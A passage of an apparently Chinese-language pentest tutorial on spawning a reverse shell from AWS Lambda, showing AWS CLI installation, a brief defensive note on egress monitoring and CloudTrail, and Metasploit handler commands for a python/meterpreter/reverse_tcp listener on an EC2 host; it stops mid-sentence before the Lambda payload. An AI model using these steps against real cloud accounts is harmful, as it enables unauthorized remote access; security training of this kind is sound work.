15、利用Lambda弹出反向shell及评估AWS API网关

利用Lambda弹出反向shell及评估AWS API网关

1. 利用Lambda弹出反向shell

在Kali实例上,可能需要安装AWS CLI,可运行以下命令进行安装:

$ apt-get install awscli -y

在Lambda中获取shell既有趣又可能对毫无防备的企业造成危险。应对此问题的一个好方法是在网络中部署监控解决方案,例如具有出口规则(用于检测流出网络的畸形流量)和入口规则(用于查看流入的数据包)的网络预防和检测系统。对于AWS而言,CloudTrail是检测AWS环境内外流量的优秀资源。

下面来看看如何结合Metasploit和Lambda,利用Metasploit中的处理程序捕获会话(会话是在Metasploit中建立的连接)。具体步骤如下:
1. 启动Metasploit并输入以下命令设置处理程序:

$ use exploit/multi/handler 
$ set payload python/meterpreter/reverse_tcp
$ set lhost <<EC2 instance DNS>>
$ set lport 1337
$ run 

运行处理程序后,它将进入监听模式,等待传入连接。这与netcat的工作方式类似,但这里使用的是Meterpreter作为解释shell,而非默认的Bash shell。Meterpreter shell比netcat连接更强大,因为

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值